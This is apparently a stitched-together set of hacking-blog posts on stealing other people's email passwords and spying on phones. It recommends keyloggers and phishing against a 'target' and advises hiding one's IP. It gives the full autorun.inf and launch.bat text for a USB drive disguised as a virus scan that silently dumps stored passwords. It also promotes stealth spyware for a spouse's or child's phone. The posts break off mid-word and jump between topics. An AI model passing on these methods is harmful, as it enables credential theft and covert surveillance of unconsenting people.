Hacking Stuff: 1. Easiest Way To Hack Yahoo Password
Hacking Stuff: 1. Easiest Way To Hack Yahoo Password
Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know
how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to
hack Yahoo password.
There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about
this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you
the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack
some one’s yahoo password.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO
ways to hack a Yahoo password: They are Keylogging and Phishing. All the other ways are scams! Here is a list of
facts that you need to know about hacking Yahoo password.
1. There is no ready made software or program that can hack a Yahoo password just by entering the target
username. If you come accross a site that claims to sell a program to hack Yahoo password then it’s 100% scam.
2. Never trust any Hacking Service that claims to hack a Yahoo password just for $100 or $200. All the hacking
services are scams.
Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use
a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer.
The following are some of the frequently asked questions about keyloggers.
1. What is a keylogger?
A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a
specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.
For a complete installation guide and more information on these two softwares visit the following links
1. SniperSpy 2. WinSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK AN EMAIL ACCOUNT IT IS HIGHLY RECOMMENDED
TO HIDE YOUR REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE
Hide the IP
2. OTHER WAYS TO HACK YAHOO PASSWORD
The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing).
Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page
that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end
up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but
the entered details(username & password) are redirected to remote server and we get redirected to some other page.
Many times we ignore this but finally we loose our valuable data.
However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job.
It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to
the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are
the easiest way to hack Yahoo passwor
How to Sniff Passwords Using USB Drive
Submitted by Srikanth on Saturday, 7 February 2009127 Comments
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows
Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian,
Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000
(POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts),
IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use
the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It
supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the
AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords,
and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and
passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your
current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password
entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field,
Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few
seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
Email Password Hacking
Submitted by Srikanth on Monday, 4 February 200840 Comments
Most of the people ask me to teach the easiest way of email password hacking. In fact the most widely asked
question on hacking is some or the other way related to email password hacking. Even if you have the similar
question in your mind here’s the answer. First of all don’t get fooled by the so called the “easiest way to hack an email
password” given on many scam sites. Here’s the scam procedure. This method is of hacking password never works.
—–<THIS IS SCAM. DO NOT TRY, BUT JUST READ IT>——
>>STEP 1- Log in to your account (yahoo,hotmail,gmail etc.)
Password Retrieval
retrieve_mypass@yahoo.com (for yahoo)
send_mypass@hotmail.com(for hotmail)
googlepass_reset@gmail.com(for gmail)
>>STEP 4- Body of the mail
In the first line type your own email address and in the next line your password.
myemailid@yahoo.com
iamafool
Give exactly 4 lines gap after this.
Now type the email address of the person you want hack.
In the next line type the following code exactly as given below
**yyb67hhfy@#yssyhhdiuhhyahoo.comsi*8??” (for yahoo)
**yyb67hhfy@#yssyhhdiuhhhotmail.comsi*8??” (for hotmail)
**yyb67hhfy@#yssyhhdiuhhgoogle.comsi*8??” (for gmail)
>>STEP 5- Now Send the mail and check your inbox after a few hours. The victims password is mailed to you by the
password resetting server.This is a major bug in most of the hosts such as yahoo,gmail etc. Here the server is
confused and it sends you the password of the victim.
Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed
information on hardware keyloggers and their use.I will also teach how to hack an email using hardware keylogger. If
you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer
my previous post Hacking an email account. Here i’ll give a breif description about keyloggers.
A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered
through the keyboard.
Now i’ll tell you what is a hardware keylogger and how it can be used for hacking an email.
Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user
keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal
memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware
keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can
never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here
are some of the images of hardware keyloggers for your convenience.
So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2
device. So it is very hard to identify it as a keylogger.
Are you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS
text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a
detailed tutorial on how to spy on cell phones.
Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you
need to know the following facts.
1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone
spy software.
2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
1. Symbian OS (Most Nokia Phones)
2. Apple iphone
3. Windows Mobile
For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the
left hand sidebar.
Today most of the modern cell phones are loaded with one of the above three operating systems and hence
compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish
this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler
for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the
following cell phone spy software to be the best one.
2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.
3. The phones’s current location is frequently logged using GPS when signal is available.
4. Each address entered into Internet Explorer (or any browser) is logged.
5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know
about the presence of this software.
How it works
The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a
username and password for you online control panel.
Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the
software starts recording all the activities on the cell phone.
Step 3- Login to your online control panel to see the logs containing the recorded information.
This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details
visit the following link
Mobile Spy
sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in
an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried
out by email or instant messaging and often directs users to enter details at a website, although phone contact has
also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the
growing number of reported phishing incidents include legislation, user training, public awareness, and technical
measures.
Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites
such as Orkut are also a target of phishing.
Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a
fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username
& password by replaying to a given email address.
www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com